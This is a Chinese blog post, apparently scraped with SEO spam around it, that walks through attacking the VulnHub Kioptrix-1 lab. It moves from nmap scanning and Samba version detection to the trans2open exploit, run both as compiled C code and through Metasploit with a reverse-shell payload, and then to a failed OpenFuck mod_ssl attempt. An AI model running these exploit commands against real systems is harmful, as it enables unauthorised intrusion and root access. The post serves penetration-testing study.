当前位置: 首页 > news >正文

网站制作南宁黑帽seo培训大神

news 2025/7/4 22:11:34
网站制作南宁,黑帽seo培训大神,网站建设逻辑,自动化的网站建设前言 靶机:kioptrix-1,IP地址为192.168.1.104 攻击:kali,IP地址为192.168.1.16 都采用虚拟机,网卡为桥接模式 文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载&…

前言

靶机:kioptrix-1,IP地址为192.168.1.104

攻击:kali,IP地址为192.168.1.16

都采用虚拟机,网卡为桥接模式

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者通过下方链接下载https://pan.quark.cn/s/1f8bfb170c6d

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

信息收集

使用nmap扫描端口

对于后续的目录爆破等,因为我个人测试过,所以发现网站的目录无价值,进而直接搜索版本漏洞进行测试

smb漏洞寻找并利用

使用searchsploit

前面直接发现139端口开启,并且nmap扫描出的是sam服务

那么使用smbclient尝试连接,看能否有东西产出

如图,并未把版本揭示,那么我对于漏洞的使用缺失重要的一块

更换工具,采用github上的一个项目进行测试https://github.com/amitn322/smb-version/blob/master/samba_version.py

下载到kali中,然后执行脚本即可

python2 smbversion.py -s 192.168.1.104

使用searchsploit进行测试,发现对应的漏洞只有一个可用于继续下一步,对于.rb,因为是msf特有的,所以暂不考虑

查看10.c文件,给出了用法

那么直接进行编译即可

gcc 10.c -o exp

编译成功,直接执行上面的用法,针对单个ip即可

./exp -b 0 -v 192.168.1.104

执行后,提权至root

使用msf

把上面作为节点,这里是新的

这里还是要检测smb服务的版本,这里借助整个msf作为使用

使用下面命令启动msf,并搜索对应的模块

msfconsole
search type:auxiliary smb version detection

那么使用该模块,命令如下

msf6 > use 0
msf6 auxiliary(scanner/smb/smb_version) > optionsmsf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.104
msf6 auxiliary(scanner/smb/smb_version) > set rport 139
msf6 auxiliary(scanner/smb/smb_version) > optionsmsf6 auxiliary(scanner/smb/smb_version) > run

执行后,会看到对应的版本信息

通过版本在msf中搜索可执行漏洞,这里注意,漏洞都是同一种trans2open,只是操作系统不同,这里靶机为linux操作系统,所以根据操作系统去选择

search type:exploit samba 2.2


use 2
optionsset rhost 192.168.1.104
//端口默认目标的是139

这里需要设置一个payload进行监听反弹shell,所以需要设置linux的监听

set payload linux/x86/shell/reverse_tcp
//脚本很多,选择其中一个即可

这时候执行,等待缓冲区溢出的爆破,一会即可发现反弹成功

web应用漏洞寻找利用

在之前使用nmap扫描时,确定443端口服务的版本mod_ssl 2.8.4,尝试进行搜索了一下,发现有版本范围内的一个漏洞openfuck

searchsploit mod_ssl 2.8.4

再使用nikto测试,发现也是有提到,可能存在

nikto -h 192.168.1.104

测试,直接使用remote buffer overflow,这个是我个人习惯,采用最新版本。

查看这个c文件,其中有用法,以及条件

那么就执行安装后,然后再编译

apt-get install libssl-dev
gcc -o openfuck 47080.c -lcrypto

执行编译后的openfuck,查看帮助,提供用法

./openfuck

大概用法就是

./openfuck 192.168.1.104 [box] 443

向下翻找,发现与前面nmap扫描出的443端口的服务版本redhat,中间件版本apache 1.3.20对应的有两个

测试这两个即可

./openfuck 192.168.1.104 0x6a 443./openfuck 192.168.1.104 0x6b 443

这里经过测试两个,发现都是提示超时

可能这里无法利用,不过查看了网上的wp,发现可以利用,这让我陷入深思,所以暂且到这里,等我搞清楚,会发布

总结

该靶机考察以下几点:

  1. 对于存在的smb服务,要能够识别出版本信息,也就是信息收集,这样才能为下一步确定有无版本信息做铺垫
  2. 善于使用searchsploit,这个是调用一个漏洞库中的信息,当然对于漏洞库也不要仅限于一个,多个漏洞库去搜索,可能这个没有,那个会有
  3. 对于给出的pocc文件等,要会编译,并复现,经常查看源文件
  4. 对于msf这个强大的工具,要会使用,至少要知道一些简单的用法

主要考察的就是对于服务的版本历史漏洞的复现,以及利用

http://www.dinnco.com/news/325.html

相关文章:

  • 域名服务器的作用是什么运营seo是什么意思
  • 耒阳做网站如何推广平台
  • 网站建设怎么做更好如何做好网络营销工作
  • redis做缓存的网站并发数永久免费建个人网站
  • 买什么样的主机(用来建网站的)支持下载建网站需要什么
  • 门户网站建设与开发潍坊seo排名
  • 便宜点的网站空间seo还能赚钱吗
  • 网站建设费用预算如何把网站推广
  • 青少年活动中心网站建设依据经典品牌推广文案
  • wordpress wp syntax重庆百度推广seo
  • 温州专业手机网站制作多少钱百度seoo优化软件
  • 高端网站建设高端网站建设专家抖音seo推荐算法
  • 电子商务网站建设与全程实例华为云速建站
  • 轻淘客cms建站教程百度搜索数据
  • 做调查网站怎样换IP湛江今日头条新闻
  • 什么网站可以做汽车国际贸易百度seo发包工具
  • 腾讯企业邮箱官网登录入口网页版网站内部链接优化方法
  • 网站空间需要续费网站推广是干嘛的
  • 海北公司网站建设多少钱网站推广推广
  • 用自己电脑做网站服务器seo综合查询是什么意思
  • 时间轴 网站模板注册自己的网站
  • 湛江小程序开发公司网站搜索引擎优化的基本内容
  • 怎么做卖花的网站如何软件网站优化公司
  • 网站开发实例及研究百度指数免费添加
  • html5做图网站网站上不去首页seo要怎么办
  • 服务器 网站建设2022适合小学生的简短新闻摘抄
  • 思源黑体做网站2024最火的十大新闻有哪些
  • 山东省住房和城乡建设厅网站教育中心培训公司排名
  • 网站建设日程表如何写外贸公司如何做推广
  • 网站建设收费标准网站优化排名哪家好